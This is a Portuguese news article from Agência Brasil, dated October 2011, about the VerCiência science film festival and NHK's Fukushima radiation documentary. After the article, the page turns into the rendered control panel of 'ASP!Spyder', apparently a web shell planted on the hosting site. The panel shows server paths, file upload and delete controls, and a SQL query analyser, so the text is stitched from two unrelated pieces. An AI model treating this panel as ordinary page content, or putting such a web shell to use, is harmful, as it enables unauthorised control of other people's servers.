Cultura

Publicada em 18 de outubro de 2011 - 10 h 49
Documentário inédito sobre desastre nuclear de Fukushima é destaque da 17ª edição da Mostra VerCiência

Marli Moreira / Repórter da Agência Brasil

São Paulo - A televisão estatal japonesa NHK é a grande homenageada da Mostra VerCiência 2011, que começa hoje (18) e vai até o dia 23 deste mês, com eventos em São Paulo, no Rio de Janeiro, em Brasília e Salvador, além de uma seleção especial de programas em outras cidades. A mostra integra a programação da Semana Nacional de Ciência e Tecnologia e tem o objetivo de divulgar a cultura científica, com a apresentação de 80 programas de dez países: Brasil, Japão, Argentina, Chile, México, Colômbia, Estados Unidos, Reino Unido, França e Itália.

Como homenageada especial, a NHK traz para o Brasil o documentário-reportagem Fukushima: Mapeando a Radiação, concluído no começo deste mês e que mostra a atuação de dois cientistas após o desastre da Usina Nuclear de Fukushima. O acidente foi provocado pelo terremoto seguido de um tsunami, em 11 de março deste ano.

A primeira exibição fora do Japão ocorrerá às 15h de hoje (18), na Escola de Comunicações e Artes (ECA) da Universidade de São Paulo (USP), com a presença do chefe da equipe de Programas de Ciência e Meio Ambiente da NHK, Toshihiro Matsumoto.

Mesmo sem ter autorização para entrar na usina, os cientistas Shinzo Kimura e Masaharu Okano, que já tinham estudado a radiação na cidade de Chernobil na Ucrânia, conseguiram retirar amostras de solo e fazer medições em um trecho de 3 mil quilômetros.

“Eles se rebelaram contra o silêncio que havia sido imposto aos pesquisadores por alguns órgãos oficiais do Japão e com a equipe da NHK foram fazer medições em campo ao redor da usina. Graças ao trabalho deles, muitas pessoas foram avisadas dos riscos de contrair doenças e deixaram suas casas”, explicou um dos curadores da mostra, o jornalista Sérgio Brandão.

Na avaliação de Brandão, também cabe à televisão estatal japonesa outro destaque: um documentário de 90 minutos sob o título Mistério dos Números Primos. “É uma parte da matemática que desafia os matemáticos e os filósofos desde a Grécia antiga e com esse programa, a NHK ganhou um prêmio que é uma espécie de Oscar japonês”, disse.

Na mostra deste ano foram selecionados seis grandes temas: mudanças climáticas; desastres naturais e prevenção de riscos; Ano Internacional da Química; mulheres na ciência; evolução e biodiversidade e aventura da ciência. A introdução do tema Mulheres na Ciência tem o objetivo de homenagear a polaca Marrie Curie (1867 a 1934), ganhadora do Prêmio Nobel de Física, em 1903 e do Prêmio Nobel de Química, em 1911.

A programação e os locais das apresentações poderão ser acessados por meio do endereço eletrônico www.verciencia.com.br.

Seu nome:
Seu-email:
Nome do amigo:
E–mail do amigo:
 
 
Você economiza água

Sim
Não
D:\web\localuser\folhadointerior\www\v2\page Path not found...
ASP!Spyder Apr2003
by ~sir_shagalot
PATH INFO : Volume Label:
Virtual: http://www.folhadointerior.com.br/v2/images/test1.asp
1 D:\web\localuser\folhadointerior\www\v2\page\
Retrieve Available Network Drives
SQL Query Analyser
+++LOGOFF+++

Delete file from current directory:
Copy file too current directory:
Folders:

0 ..

Directory:


Files:



Listed: 0Listed: 61

2 SELECT FILES TO UPLOAD:




















  

NOTE FOR UPLOAD - YOU MUST HAVE VBSCRIPT v5.0 INSTALLED ON YOUR WEB SERVER  FOR THIS LIBRARY TO FUNCTION CORRECTLY. YOU CAN OBTAIN IT FREE FROM MICROSOFT WHEN YOU INSTALL INTERNET EXPLORER 5.0 OR LATER. WHICH IS, MOST LIKELY, ALREADY INSTALLED.

Copyright 2003 Vela iNC.
[ System: 26/8/2015 23:58:53 ]